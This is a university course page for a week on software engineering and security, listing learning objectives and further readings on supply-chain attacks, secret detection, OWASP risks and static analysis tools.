Last updated: Feb 08, 23 18:46 UTC | Permalink
Week 10 - Software Engineering and Security
Learning Objectives:
In this week of the course, you will learn to:
- Describe that security is a spectrum, and be able to define a realistic threat model for a given system
- Evaluate the tradeoffs between security and costs in software engineering
- Recognize the causes of and common mitigations for common vulnerabilities in web applications
- Utilize static analysis tools to identify common weaknesses in code
Lessons:
- Software Engineering + Security Slides PDF, PPT
For Further Reading:
- “What are Weak Links in the npm Supply Chain?”
- “Why secret detection tools are not enough: It’s not just about false positives - An industrial case study”
- “A comparative study of vulnerability reporting by software composition analysis tools”
- “Practical Automated Detection of Malicious npm Packages”
- HashiCorp Vault
- “OWASP Top 10 Web Security Risks”
- LGTM analysis of transcript server and XSS example on transcript server (This link might be annoying, but is not malicious)
- Software supply-chain vulnerabilities: ESLint 2018 attack, Podcast on SolarWinds attack
- Security awareness/training activity: OWASP Juice Shop, online demo